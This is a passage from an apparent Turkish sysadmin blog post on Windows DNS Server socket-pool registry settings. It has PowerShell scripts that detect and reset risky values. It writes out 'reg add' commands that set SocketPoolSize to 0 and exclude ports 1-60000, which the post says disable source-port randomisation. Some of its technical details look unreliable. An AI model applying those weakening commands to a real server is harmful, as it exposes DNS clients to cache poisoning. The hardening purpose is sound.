say\u0131da sahte sorgu g&ouml;nderip sunucuyu s&uuml;rekli recursive sorgu g&ouml;ndermeye zorlarsa, havuzdaki kullan\u0131labilir portlar t&uuml;kenebilir.<\/p>\r\n<p>Bu koruma mekanizmas\u0131, sunucunun a\u015f\u0131r\u0131 y&uuml;k alt\u0131nda oldu\u011funu alg\u0131lad\u0131\u011f\u0131nda, belirli bir s&uuml;re i&ccedil;in ayn\u0131 kaynak portunu yeniden kullanmaya ba\u015flar. Bu, performans\u0131 ve hizmet s&uuml;reklili\u011fini korumak i&ccedil;in tasarlanm\u0131\u015f bir davran\u0131\u015ft\u0131r. Sald\u0131r\u0131 durumu sona erdi\u011finde, sunucu normal, rastgele port kullan\u0131m\u0131na geri d&ouml;ner.<\/p>\r\n<p>&nbsp;<\/p>\r\n<h3 data-start=\"281\" data-end=\"311\"><strong data-start=\"286\" data-end=\"311\">1. SocketPoolSize = 0<\/strong><\/h3>\r\n<div class=\"contain-inline-size rounded-2xl relative bg-token-sidebar-surface-primary\">\r\n<div class=\"sticky top-9\">\r\n<div class=\"absolute end-0 bottom-0 flex h-9 items-center pe-2\">\r\n<div class=\"bg-token-bg-elevated-secondary text-token-text-secondary flex items-center gap-4 rounded-sm px-2 font-sans text-xs\">&nbsp;<\/div>\r\n<\/div>\r\n<\/div>\r\n<div class=\"overflow-y-auto p-4\" dir=\"ltr\"><code class=\"whitespace-pre!\">reg add <span class=\"hljs-string\">\"HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\"<\/span> \/v SocketPoolSize \/t REG_DWORD \/d 0 \/f\r\n<\/code><\/div>\r\n<\/div>\r\n<h4 data-start=\"424\" data-end=\"442\">Ne i\u015fe yarar?<\/h4>\r\n<p data-start=\"443\" data-end=\"581\">Windows DNS Server, DNS sorgular\u0131 i&ccedil;in <strong data-start=\"482\" data-end=\"506\">rastgele kaynak port<\/strong> kullan\u0131r. Bu davran\u0131\u015f <em data-start=\"529\" data-end=\"550\">DNS Cache Poisoning<\/em> sald\u0131r\u0131lar\u0131n\u0131 &ouml;nlemek i&ccedil;indir.<\/p>\r\n<p data-start=\"583\" data-end=\"656\"><strong data-start=\"583\" data-end=\"601\">SocketPoolSize<\/strong>, DNS Server&rsquo;\u0131n kullanabilece\u011fi port say\u0131s\u0131n\u0131 belirler.<\/p>\r\n<ul data-start=\"658\" data-end=\"797\">\r\n<li data-start=\"658\" data-end=\"700\">\r\n<p data-start=\"660\" data-end=\"700\"><strong data-start=\"660\" data-end=\"665\">0<\/strong> &rarr; Socket pool tamamen kapat\u0131l\u0131r.<\/p>\r\n<\/li>\r\n<li data-start=\"701\" data-end=\"797\">\r\n<p data-start=\"703\" data-end=\"797\">DNS Server <strong data-start=\"714\" data-end=\"737\">tek bir statik port<\/strong> (genelde 53 veya k&uuml;&ccedil;&uuml;k bir port aral\u0131\u011f\u0131) kullanmaya ba\u015flar.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<h4 data-start=\"799\" data-end=\"823\">Bu ne anlama gelir?<\/h4>\r\n<ul data-start=\"824\" data-end=\"981\">\r\n<li data-start=\"824\" data-end=\"862\">\r\n<p data-start=\"826\" data-end=\"862\"><strong data-start=\"826\" data-end=\"860\">G&uuml;venlik ciddi \u015fekilde azal\u0131r.<\/strong><\/p>\r\n<\/li>\r\n<li data-start=\"863\" data-end=\"909\">\r\n<p data-start=\"865\" data-end=\"909\">DNS kaynak port randomization kapal\u0131 olur.<\/p>\r\n<\/li>\r\n<li data-start=\"910\" data-end=\"981\">\r\n<p data-start=\"912\" data-end=\"981\">DNS spoofing \/ cache poisoning sald\u0131r\u0131lar\u0131 &ccedil;ok daha kolay hale gelir.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<p data-start=\"983\" data-end=\"1050\"><strong data-start=\"983\" data-end=\"994\">K\u0131saca:<\/strong> DNS Server &ldquo;rasgele port kullanma&rdquo; &ouml;zelli\u011fini kaybeder.<\/p>\r\n<h3 data-start=\"1057\" data-end=\"1109\">SocketPoolExcludedPortRanges = \"1-60000\"<\/h3>\r\n<div class=\"contain-inline-size rounded-2xl relative bg-token-sidebar-surface-primary\">\r\n<div class=\"sticky top-9\">\r\n<div class=\"absolute end-0 bottom-0 flex h-9 items-center pe-2\">\r\n<div class=\"bg-token-bg-elevated-secondary text-token-text-secondary flex items-center gap-4 rounded-sm px-2 font-sans text-xs\">&nbsp;<\/div>\r\n<\/div>\r\n<\/div>\r\n<div class=\"overflow-y-auto p-4\" dir=\"ltr\"><code class=\"whitespace-pre!\">reg add <span class=\"hljs-string\">\"HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\"<\/span> \/v SocketPoolExcludedPortRanges \/t REG_MULTI_SZ \/d <span class=\"hljs-string\">\"1-60000\"<\/span> \/f\r\n<\/code><\/div>\r\n<\/div>\r\n<h4 data-start=\"1247\" data-end=\"1265\">Ne i\u015fe yarar?<\/h4>\r\n<p data-start=\"1266\" data-end=\"1356\">Bu ayar, socket pool taraf\u0131ndan <strong data-start=\"1298\" data-end=\"1346\">kullan\u0131lmamas\u0131 gereken UDP port aral\u0131klar\u0131n\u0131<\/strong> tan\u0131mlar.<\/p>\r\n<p data-start=\"1358\" data-end=\"1365\">Burada:<\/p>\r\n<ul data-start=\"1367\" data-end=\"1443\">\r\n<li data-start=\"1367\" data-end=\"1399\">\r\n<p data-start=\"1369\" data-end=\"1399\"><strong data-start=\"1369\" data-end=\"1380\">1-60000<\/strong> aral\u0131\u011f\u0131 d\u0131\u015flanm\u0131\u015f.<\/p>\r\n<\/li>\r\n<li data-start=\"1400\" data-end=\"1443\">\r\n<p data-start=\"1402\" data-end=\"1443\">Yani DNS Server bu portlar\u0131 <em data-start=\"1430\" data-end=\"1442\">kullanamaz<\/em>.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<h4 data-start=\"1445\" data-end=\"1469\">Bu ne anlama gelir?<\/h4>\r\n<ul data-start=\"1470\" data-end=\"1646\">\r\n<li data-start=\"1470\" data-end=\"1583\">\r\n<p data-start=\"1472\" data-end=\"1583\">1&ndash;60000 aras\u0131 t&uuml;m UDP portlar\u0131 yasaklan\u0131nca <strong data-start=\"1516\" data-end=\"1582\">DNS Server&rsquo;\u0131n kullanabilece\u011fi sadece 60001&ndash;65535 aras\u0131 kal\u0131yor<\/strong>.<\/p>\r\n<\/li>\r\n<li data-start=\"1584\" data-end=\"1646\">\r\n<p data-start=\"1586\" data-end=\"1646\">Ancak SocketPoolSize=0 oldu\u011fundan bu havuz zaten devre d\u0131\u015f\u0131.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<p data-start=\"1648\" data-end=\"1670\">Bu durumda DNS Server:<\/p>\r\n<ul data-start=\"1672\" data-end=\"1793\">\r\n<li data-start=\"1672\" data-end=\"1703\">\r\n<p data-start=\"1674\" data-end=\"1703\">Ya <strong data-start=\"1677\" data-end=\"1693\">tek bir port<\/strong> kullan\u0131r,<\/p>\r\n<\/li>\r\n<li data-start=\"1704\" data-end=\"1793\">\r\n<p data-start=\"1706\" data-end=\"1793\">Ya da &ccedil;o\u011fu zaman <strong data-start=\"1723\" data-end=\"1751\">ba\u015flat\u0131lamaz \/ &ccedil;al\u0131\u015famaz<\/strong>, event log'da socket bind hatalar\u0131 verir.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<h3 data-start=\"1800\" data-end=\"1847\">Bu iki ayar bir araya gelince ne olur?<\/h3>\r\n<ul>\r\n<li data-start=\"1848\" data-end=\"2029\">SocketPoolSize=0 &rarr; DNS rastgele port kullanamaz<\/li>\r\n<li data-start=\"1848\" data-end=\"2029\">1&ndash;60000 d\u0131\u015fland\u0131 &rarr; neredeyse t&uuml;m portlar yasak<\/li>\r\n<li data-start=\"1848\" data-end=\"2029\">Geriye sadece 60001&ndash;65535 aras\u0131 k&uuml;&ccedil;&uuml;k bir alan kal\u0131r (ama pool zaten kapal\u0131)<\/li>\r\n<\/ul>\r\n<p data-start=\"2031\" data-end=\"2040\">Bu durum:<\/p>\r\n<ul data-start=\"2042\" data-end=\"2248\">\r\n<li data-start=\"2042\" data-end=\"2101\">\r\n<p data-start=\"2044\" data-end=\"2101\">&Ccedil;o\u011fu yap\u0131land\u0131rmada <strong data-start=\"2064\" data-end=\"2101\">DNS Server&rsquo;\u0131n do\u011fru &ccedil;al\u0131\u015fmamas\u0131na<\/strong><\/p>\r\n<\/li>\r\n<li data-start=\"2102\" data-end=\"2154\">\r\n<p data-start=\"2104\" data-end=\"2154\">UDP port bind hatalar\u0131na (Event ID 408, 404, 4010)<\/p>\r\n<\/li>\r\n<li data-start=\"2155\" data-end=\"2192\">\r\n<p data-start=\"2157\" data-end=\"2192\">DNS sorgular\u0131n\u0131n cevap verememesine<\/p>\r\n<\/li>\r\n<li data-start=\"2193\" data-end=\"2248\">\r\n<p data-start=\"2195\" data-end=\"2248\">&Ccedil;ok y&uuml;ksek g&uuml;venlik zafiyeti olu\u015fmas\u0131na<br data-start=\"2234\" data-end=\"2237\">sebep olur.<\/p>\r\n<\/li>\r\n<\/ul>\r\n<h4 data-start=\"2255\" data-end=\"2289\">Bu ayarlar neden yap\u0131l\u0131r?<\/h4>\r\n<p data-start=\"2290\" data-end=\"2401\">Genelde <strong data-start=\"2298\" data-end=\"2313\">yanl\u0131\u015fl\u0131kla<\/strong>, hatal\u0131 bir g&uuml;venlik talimat\u0131ndan veya \"t&uuml;m portlar\u0131 blokla\" gibi d&uuml;\u015f&uuml;ncelerden dolay\u0131.<\/p>\r\n<p data-start=\"2403\" data-end=\"2423\">Baz\u0131 durumlarda ise:<\/p>\r\n<ul data-start=\"2425\" data-end=\"2498\">\r\n<li data-start=\"2425\" data-end=\"2461\">\r\n<p data-start=\"2427\" data-end=\"2461\">Firewall&rsquo;da &ouml;zel bir sald\u0131r\u0131 testi<\/p>\r\n<\/li>\r\n<li data-start=\"2462\" data-end=\"2498\">\r\n<p data-start=\"2464\" data-end=\"2498\">IDS\/IPS davran\u0131\u015f\u0131 g&ouml;zlemlemek i&ccedil;in<\/p>\r\n<\/li>\r\n<\/ul>\r\n<p data-start=\"2500\" data-end=\"2576\">k\u0131smi olarak yap\u0131l\u0131r; ama <strong data-start=\"2526\" data-end=\"2575\">&uuml;retim DNS sunucusunda kesinlikle kullan\u0131lmaz<\/strong>.<\/p>\r\n<h4 data-start=\"2583\" data-end=\"2637\">&Ouml;nerilen g&uuml;venli de\u011ferler (Microsoft Standartlar\u0131)<\/h4>\r\n<div class=\"contain-inline-size rounded-2xl relative bg-token-sidebar-surface-primary\">\r\n<div class=\"sticky top-9\">\r\n<div class=\"absolute end-0 bottom-0 flex h-9 items-center pe-2\">\r\n<div class=\"bg-token-bg-elevated-secondary text-token-text-secondary flex items-center gap-4 rounded-sm px-2 font-sans text-xs\">\r\n<pre class=\"language-csharp\"><code>SocketPoolSize = 2500    (varsay\u0131lan: 2500)\r\nSocketPoolExcludedPortRanges = bo\u015f b\u0131rak \/ sadece &ccedil;ak\u0131\u015fan portlar\u0131 d\u0131\u015fla\r\n<\/code><\/pre>\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<div class=\"overflow-y-auto p-4\" dir=\"ltr\">&nbsp;<\/div>\r\n<div class=\"overflow-y-auto p-4\" dir=\"ltr\">\r\n<h5 data-start=\"114\" data-end=\"175\"><strong data-start=\"118\" data-end=\"175\">DNS Ayarlar\u0131n\u0131 Varsay\u0131lan Yap (Microsoft Recommended)<\/strong><\/h5>\r\n<h6 data-start=\"177\" data-end=\"218\"><strong data-start=\"180\" data-end=\"218\">1) SocketPoolSize varsay\u0131lan: 2500<\/strong><\/h6>\r\n<div class=\"contain-inline-size rounded-2xl relative bg-token-sidebar-surface-primary\">\r\n<div class=\"sticky top-9\">\r\n<div class=\"absolute end-0 bottom-0 flex h-9 items-center pe-2\">\r\n<div class=\"bg-token-bg-elevated-secondary text-token-text-secondary flex items-center gap-4 rounded-sm px-2 font-sans text-xs\">&nbsp;<\/div>\r\n<\/div>\r\n<\/div>\r\n<div class=\"overflow-y-auto p-4\" dir=\"ltr\"><code class=\"whitespace-pre!\">reg add <span class=\"hljs-string\">\"HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\"<\/span> \/v SocketPoolSize \/t REG_DWORD \/d 2500 \/f\r\n<\/code><\/div>\r\n<\/div>\r\n<h6 data-start=\"334\" data-end=\"398\"><strong data-start=\"337\" data-end=\"398\">2) SocketPoolExcludedPortRanges temizle (varsay\u0131lan: bo\u015f)<\/strong><\/h6>\r\n<div class=\"contain-inline-size rounded-2xl relative bg-token-sidebar-surface-primary\">\r\n<div class=\"sticky top-9\">\r\n<div class=\"absolute end-0 bottom-0 flex h-9 items-center pe-2\">\r\n<div class=\"bg-token-bg-elevated-secondary text-token-text-secondary flex items-center gap-4 rounded-sm px-2 font-sans text-xs\">&nbsp;<\/div>\r\n<\/div>\r\n<\/div>\r\n<div class=\"overflow-y-auto p-4\" dir=\"ltr\"><code class=\"whitespace-pre!\">reg delete <span class=\"hljs-string\">\"HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\"<\/span> \/v SocketPoolExcludedPortRanges \/f\r\n<\/code><\/div>\r\n<\/div>\r\n<hr data-start=\"510\" data-end=\"513\">\r\n<h6 data-start=\"515\" data-end=\"552\"><strong data-start=\"520\" data-end=\"552\">DNS Servisini Yeniden Ba\u015flat<\/strong><\/h6>\r\n<p data-start=\"553\" data-end=\"610\">Ayarlar\u0131n etkin olmas\u0131 i&ccedil;in DNS servisini yeniden ba\u015flat:<\/p>\r\n<div class=\"contain-inline-size rounded-2xl relative bg-token-sidebar-surface-primary\">\r\n<div class=\"sticky top-9\">\r\n<div class=\"absolute end-0 bottom-0 flex h-9 items-center pe-2\">\r\n<div class=\"bg-token-bg-elevated-secondary text-token-text-secondary flex items-center gap-4 rounded-sm px-2 font-sans text-xs\">&nbsp;<\/div>\r\n<\/div>\r\n<\/div>\r\n<div class=\"overflow-y-auto p-4\" dir=\"ltr\"><code class=\"whitespace-pre!\">net stop dns\r\nnet start dns\r\n<\/code><\/div>\r\n<\/div>\r\n<p data-start=\"648\" data-end=\"664\">veya PowerShell:<\/p>\r\n<div class=\"contain-inline-size rounded-2xl relative bg-token-sidebar-surface-primary\">\r\n<div class=\"sticky top-9\">\r\n<div class=\"absolute end-0 bottom-0 flex h-9 items-center pe-2\">\r\n<div class=\"bg-token-bg-elevated-secondary text-token-text-secondary flex items-center gap-4 rounded-sm px-2 font-sans text-xs\">&nbsp;<\/div>\r\n<\/div>\r\n<\/div>\r\n<div class=\"overflow-y-auto p-4\" dir=\"ltr\"><code class=\"whitespace-pre!\"><span class=\"hljs-built_in\">Restart-Service<\/span> DNS\r\n<\/code><\/div>\r\n<\/div>\r\n<hr data-start=\"695\" data-end=\"698\">\r\n<h3><strong>DNS Kayd\u0131n\u0131 Yap\u0131land\u0131rma<\/strong><\/h3>\r\n<p>DNS sunucusunu her DNS sunucusu ayar\u0131 de\u011fi\u015ftirildi\u011finde, her DNS b&ouml;lgesi ayar\u0131 de\u011fi\u015ftirildi\u011finde veya DNS kaynak kayd\u0131 de\u011fi\u015ftirildi\u011finde olay g&uuml;nl&uuml;\u011f&uuml;ne olay yazacak \u015fekilde yap\u0131land\u0131rabilirsiniz. \u015eimdi, y&uuml;ksek g&uuml;venlikli ortamlarda DNS sunucunuzda neler olup bitti\u011fini takip etmek istedi\u011finizde, kesinlikle kay\u0131t i\u015flemlerinin etkin olmas\u0131 gerekir.<\/p>\r\n<p>DNS kay\u0131tlar\u0131n\u0131n yap\u0131land\u0131r\u0131labilece\u011fi iki farkl\u0131 yer vard\u0131r; DNS sunucunuzdan almaya &ccedil;al\u0131\u015ft\u0131\u011f\u0131n\u0131z bilgi t&uuml;r&uuml;ne ba\u011fl\u0131 olarak, her ikisi de sunucu ad\u0131n\u0131n &Ouml;zellikleri alt\u0131nda yap\u0131land\u0131r\u0131lm\u0131\u015ft\u0131r; ilki Olay Kayd\u0131 sekmesidir. \u015eimdi Olay Kayd\u0131, bu asl\u0131nda DNS sunucusunda olan idari ve b&uuml;y&uuml;k &ouml;l&ccedil;ekli olaylar\u0131 kaydedecek. T&uuml;m olaylar\u0131, olaylar\u0131 ve uyar\u0131lar\u0131 yap\u0131land\u0131rabilirsiniz; sadece hata veya hi&ccedil; etkinlik yok ve bunlar\u0131 DNS servislerini &ccedil;al\u0131\u015ft\u0131ran sunucunun Windows Olay G&uuml;nl&uuml;\u011f&uuml;'nde bulacaks\u0131n\u0131z. Bunlar da b&uuml;y&uuml;k &ouml;l&ccedil;ekli etkinliklerdir.<\/p>\r\n<h4 data-start=\"700\" data-end=\"718\">&nbsp;<img src=\"https:\/\/mehic.se\/wp-content\/uploads\/2017\/04\/screenshot-264.jpg?w=616\" alt=\"screenshot.26.jpg\"><\/h4>\r\n<h4 data-start=\"700\" data-end=\"718\">&nbsp;<\/h4>\r\n<p><strong>Hata Kayd\u0131<\/strong><\/p>\r\n<p>DNS istemleyicileriniz ile DNS sunucunuz aras\u0131ndaki ileti\u015fimi biraz daha derinlemesine incelemeniz gerekebilir ve bunu nas\u0131l yapabilece\u011finiz, bilgi kayd\u0131 olan Debug Logging sekmesi alt\u0131ndad\u0131r; bu sekme bilgileri olay g&uuml;nl&uuml;\u011f&uuml;ne kaydetmiyor. Bunun yerine, belirli bir dosya yolu ve ismine kaydeder. Bu cihaz varsay\u0131lan olarak devre d\u0131\u015f\u0131 b\u0131rak\u0131l\u0131yor &ccedil;&uuml;nk&uuml; &ccedil;ok g&uuml;r&uuml;lt&uuml;l&uuml; oluyor ve &ccedil;ok fazla bilgi &uuml;retiyor. Genellikle, paket y&ouml;n&uuml;, protokol t&uuml;r&uuml; ve i&ccedil;erik gibi tam olarak arad\u0131\u011f\u0131n\u0131z bilgileri belirlemek istersiniz ve kay\u0131tlar\u0131n\u0131z\u0131 m&uuml;mk&uuml;n oldu\u011funca temiz tutmak i&ccedil;in belirli IP adreslerine de uyarlamak isteyebilirsiniz. \u015ea\u015f\u0131rt\u0131c\u0131 bir \u015fekilde, bazen bir sunucuda hata ay\u0131klama giri\u015fi yapman\u0131z gerekecek. Bu, g&ouml;&ccedil;ler oldu\u011funda, belirli bir b&ouml;lgenin terk edilip edilmedi\u011fini belirlemeye &ccedil;al\u0131\u015f\u0131ld\u0131\u011f\u0131nda ve o b&ouml;lgedeki kaynaklar hakk\u0131nda bilgi talep etmeye &ccedil;al\u0131\u015fan m&uuml;\u015fterilerin olmad\u0131\u011f\u0131nda olduk&ccedil;a yayg\u0131n olarak ger&ccedil;ekle\u015febilir. Bir b&ouml;lgeyi devre d\u0131\u015f\u0131 b\u0131rakmak istiyorsan\u0131z, o b&ouml;lgede h&acirc;l&acirc; bilgiye ihtiyac\u0131 olan birinin olup olmad\u0131\u011f\u0131n\u0131 belirlemek i&ccedil;in. Bu Hata Hata Kayd\u0131 sekmesi, hangi m&uuml;\u015fterilerin hangi bilgileri talep etti\u011fine dair uzun bir bilgi listesini sundu\u011fu i&ccedil;in bu bilgileri bulmak i&ccedil;in en iyi yerdir.<\/p>\r\n<p><img src=\"https:\/\/mehic.se\/wp-content\/uploads\/2017\/04\/screenshot-276.jpg?w=616\" alt=\"screenshot.27.jpg\"><\/p>\r\n<h4 data-start=\"700\" data-end=\"718\">Ne oldu \u015fimdi?<\/h4>\r\n<ul data-start=\"720\" data-end=\"927\">\r\n<li data-start=\"720\" data-end=\"801\">\r\n<p data-start=\"722\" data-end=\"801\">DNS <strong data-start=\"726\" data-end=\"750\">rastgele kaynak port<\/strong> kullanmaya geri d&ouml;nd&uuml; &rarr; G&uuml;venlik tekrar sa\u011fland\u0131<\/p>\r\n<\/li>\r\n<li data-start=\"802\" data-end=\"839\">\r\n<p data-start=\"804\" data-end=\"839\">T&uuml;m port engellemeleri temizlendi<\/p>\r\n<\/li>\r\n<li data-start=\"840\" data-end=\"884\">\r\n<p data-start=\"842\" data-end=\"884\">DNS Server art\u0131k port bind hatas\u0131 vermez<\/p>\r\n<\/li>\r\n<li data-start=\"885\" data-end=\"927\">\r\n<p data-start=\"887\" data-end=\"927\">Cache poisoning riskleri minimuma iner<\/p>\r\n<\/li>\r\n<\/ul>\r\n<h3>DNS Registry Kontrol &amp; Otomatik Fix Scripti (PowerShell)<\/h3>\r\n<pre class=\"language-csharp\"><code>&lt;#  \r\n    DNS Registry Health Check &amp; Auto-Fix Script\r\n    Checks for:\r\n    - SocketPoolSize\r\n    - SocketPoolExcludedPortRanges\r\n    - DNS port bind issues\r\n    - Non-default high-risk settings\r\n    - https:\/\/ondernet\/net\r\n\r\n#&gt;\r\n\r\nWrite-Host \"=== DNS Registry Health Check Ba\u015flad\u0131 ===\" -ForegroundColor Cyan\r\n\r\n$RegPath = \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\"\r\n\r\n# SocketPoolSize kontrol\r\n$SocketPoolSize = Get-ItemProperty -Path $RegPath -Name \"SocketPoolSize\" -ErrorAction SilentlyContinue\r\n\r\nif ($SocketPoolSize) {\r\n    if ($SocketPoolSize.SocketPoolSize -eq 0) {\r\n        Write-Host \"\u26a0 SocketPoolSize = 0 (TEHL\u0130KEL\u0130)\" -ForegroundColor Red\r\n        $FixSocket = $true\r\n    }\r\n    elseif ($SocketPoolSize.SocketPoolSize -lt 1024) {\r\n        Write-Host \"\u26a0 SocketPoolSize &ccedil;ok d&uuml;\u015f&uuml;k: $($SocketPoolSize.SocketPoolSize)\" -ForegroundColor Yellow\r\n        $FixSocket = $true\r\n    }\r\n    else {\r\n        Write-Host \"\u2714 SocketPoolSize normal: $($SocketPoolSize.SocketPoolSize)\" -ForegroundColor Green\r\n    }\r\n}\r\nelse {\r\n    Write-Host \"\u26a0 SocketPoolSize bulunamad\u0131. Varsay\u0131lana &ccedil;ekilecek.\" -ForegroundColor Yellow\r\n    $FixSocket = $true\r\n}\r\n\r\n# SocketPoolExcludedPortRanges kontrol\r\n$Excluded = Get-ItemProperty -Path $RegPath -Name \"SocketPoolExcludedPortRanges\" -ErrorAction SilentlyContinue\r\n\r\nif ($Excluded) {\r\n    Write-Host \"\u26a0 Port d\u0131\u015flama aktif: $($Excluded.SocketPoolExcludedPortRanges)\" -ForegroundColor Red\r\n    $FixRanges = $true\r\n}\r\nelse {\r\n    Write-Host \"\u2714 Port d\u0131\u015flama ayar\u0131 yok (normal).\" -ForegroundColor Green\r\n}\r\n\r\n# Fix i\u015flemine ba\u015fla\r\nif ($FixSocket -or $FixRanges) {\r\n    Write-Host \"`n=== D&uuml;zeltme \u0130\u015flemi Ba\u015fl\u0131yor ===\" -ForegroundColor Cyan\r\n    \r\n    if ($FixSocket) {\r\n        Write-Host \"&rarr; SocketPoolSize varsay\u0131lan de\u011fere (2500) &ccedil;ekiliyor...\" -ForegroundColor Yellow\r\n        reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\" \/v SocketPoolSize \/t REG_DWORD \/d 2500 \/f | Out-Null\r\n    }\r\n\r\n    if ($FixRanges) {\r\n        Write-Host \"&rarr; SocketPoolExcludedPortRanges temizleniyor...\" -ForegroundColor Yellow\r\n        reg delete \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\" \/v SocketPoolExcludedPortRanges \/f | Out-Null\r\n    }\r\n\r\n    Write-Host \"DNS servisi yeniden ba\u015flat\u0131l\u0131yor...\" -ForegroundColor Yellow\r\n    Restart-Service DNS\r\n\r\n    Write-Host \"\u2714 D&uuml;zeltme Tamamland\u0131!\" -ForegroundColor Green\r\n}\r\nelse {\r\n    Write-Host \"\u2714 Sistem sa\u011fl\u0131kl\u0131. D&uuml;zeltme gerekmedi.\" -ForegroundColor Green\r\n}\r\n\r\nWrite-Host \"=== \u0130\u015flem Bitti ===\" -ForegroundColor Cyan\r\n<\/code><\/pre>\r\n<\/div>\r\n<\/div>\r\n<h4 data-start=\"2824\" data-end=\"2851\">Script Ne Yap\u0131yor?<\/h4>\r\n<div class=\"_tableContainer_1rjym_1\">\r\n<div class=\"group _tableWrapper_1rjym_13 flex w-fit flex-col-reverse\" tabindex=\"-1\">\r\n<table class=\"w-fit min-w-(--thread-content-width)\" data-start=\"2853\" data-end=\"3082\">\r\n<thead data-start=\"2853\" data-end=\"2880\">\r\n<tr data-start=\"2853\" data-end=\"2880\">\r\n<th data-start=\"2853\" data-end=\"2863\" data-col-size=\"sm\">Kontrol<\/th>\r\n<th data-start=\"2863\" data-end=\"2871\" data-col-size=\"sm\">Sorun<\/th>\r\n<th data-start=\"2871\" data-end=\"2880\" data-col-size=\"sm\">&Ccedil;&ouml;z&uuml;m<\/th>\r\n<\/tr>\r\n<\/thead>\r\n<tbody data-start=\"2909\" data-end=\"3082\">\r\n<tr data-start=\"2909\" data-end=\"2965\">\r\n<td data-start=\"2909\" data-end=\"2930\" data-col-size=\"sm\"><strong data-start=\"2911\" data-end=\"2929\">SocketPoolSize<\/strong><\/td>\r\n<td data-start=\"2930\" data-end=\"2949\" data-col-size=\"sm\">0 veya &ccedil;ok d&uuml;\u015f&uuml;k<\/td>\r\n<td data-start=\"2949\" data-end=\"2965\" data-col-size=\"sm\">2500&rsquo;e &ccedil;eker<\/td>\r\n<\/tr>\r\n<tr data-start=\"2966\" data-end=\"3025\">\r\n<td data-start=\"2966\" data-end=\"2991\" data-col-size=\"sm\"><strong data-start=\"2968\" data-end=\"2990\">ExcludedPortRanges<\/strong><\/td>\r\n<td data-start=\"2991\" data-end=\"3008\" data-col-size=\"sm\">Aral\u0131k tan\u0131ml\u0131<\/td>\r\n<td data-start=\"3008\" data-end=\"3025\" data-col-size=\"sm\">Tamamen siler<\/td>\r\n<\/tr>\r\n<tr data-start=\"3026\" data-end=\"3082\">\r\n<td data-start=\"3026\" data-end=\"3056\" data-col-size=\"sm\"><strong data-start=\"3028\" data-end=\"3055\">DNS&rsquo;yi yeniden ba\u015flat\u0131r<\/strong><\/td>\r\n<td data-start=\"3056\" data-end=\"3077\" data-col-size=\"sm\">Ayarlar aktif olur<\/td>\r\n<td data-start=\"3077\" data-end=\"3082\" data-col-size=\"sm\">\u2714<\/td>\r\n<\/tr>\r\n<\/tbody>\r\n<\/table>\r\n<p data-start=\"3105\" data-end=\"3146\">PowerShell&rsquo;i <strong data-start=\"3118\" data-end=\"3142\">Run as Administrator<\/strong> a&ccedil;:<\/p>\r\n<div class=\"contain-inline-size rounded-2xl relative bg-token-sidebar-surface-primary\">\r\n<div class=\"sticky top-9\">\r\n<div class=\"absolute end-0 bottom-0 flex h-9 items-center pe-2\">\r\n<div class=\"bg-token-bg-elevated-secondary text-token-text-secondary flex items-center gap-4 rounded-sm px-2 font-sans text-xs\">\r\n<pre class=\"language-csharp\"><code>powershell -ExecutionPolicy Bypass -File DNS-Fix.ps1\r\n<\/code><\/pre>\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<div class=\"overflow-y-auto p-4\" dir=\"ltr\">&nbsp;<\/div>\r\n<\/div>\r\n<\/div>\r\n<\/div>\r\n<h4>DNS Sa\u011fl\u0131k Kontrol Scripti<\/h4>\r\n<p>\u2714 Log tutar<br data-start=\"107\" data-end=\"110\">\u2714 Mail g&ouml;nderir<br data-start=\"125\" data-end=\"128\">\u2714 GUI ekran\u0131 ile sonu&ccedil;lar\u0131 g&ouml;sterir<\/p>\r\n<pre class=\"language-csharp\"><code>Add-Type -AssemblyName PresentationFramework\r\n\r\n&lt;# =========================================================\r\n    DNS Advanced Checker  \r\n    \u2714 Registry Health Check  \r\n    \u2714 Loglama  \r\n    \u2714 Email Bildirimi  \r\n    \u2714 GUI Sonu&ccedil; Ekran\u0131\r\n========================================================= #&gt;\r\n\r\n# ======= Ayarlar (D&Uuml;ZENLE) =======\r\n$LogPath = \"C:\\DNS-Fix-Logs\"\r\n$SmtpServer = \"smtp.domain.com\"\r\n$SmtpFrom = \"dns-monitor@domain.com\"\r\n$SmtpTo   = \"admin@domain.com\"\r\n$MailEnable = $false     # Mail g&ouml;nderimi i&ccedil;in: $true yap\r\n# ==================================\r\n\r\nif (!(Test-Path $LogPath)) { New-Item -ItemType Directory -Path $LogPath | Out-Null }\r\n$LogFile = \"$LogPath\\DNS_Check_$(Get-Date -Format 'yyyyMMdd_HHmmss').log\"\r\n\r\nfunction Log {\r\n    param($msg)\r\n    $time = (Get-Date -Format \"yyyy-MM-dd HH:mm:ss\")\r\n    $line = \"[$time] $msg\"\r\n    Add-Content -Path $LogFile -Value $line\r\n    Write-Host $line\r\n}\r\n\r\nLog \"DNS Sa\u011fl\u0131k Kontrol&uuml; Ba\u015flad\u0131\"\r\n\r\n$RegPath = \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\"\r\n$FixNeeded = $false\r\n$Report = \"\"\r\n\r\n# ========== 1) SocketPoolSize ==========\r\ntry {\r\n    $SocketPool = Get-ItemProperty -Path $RegPath -Name \"SocketPoolSize\" -ErrorAction Stop\r\n    if ($SocketPool.SocketPoolSize -eq 0) {\r\n        $Report += \"\u26a0 SocketPoolSize = 0 (Tehlikeli)`n\"\r\n        Log \"Tehlike: SocketPoolSize = 0\"\r\n        $FixSocket = $true\r\n    }\r\n    elseif ($SocketPool.SocketPoolSize -lt 1024) {\r\n        $Report += \"\u26a0 SocketPoolSize d&uuml;\u015f&uuml;k ($($SocketPool.SocketPoolSize))`n\"\r\n        Log \"Uyar\u0131: SocketPoolSize d&uuml;\u015f&uuml;k\"\r\n        $FixSocket = $true\r\n    }\r\n    else {\r\n        $Report += \"\u2714 SocketPoolSize normal ($($SocketPool.SocketPoolSize))`n\"\r\n        Log \"SocketPoolSize normal\"\r\n    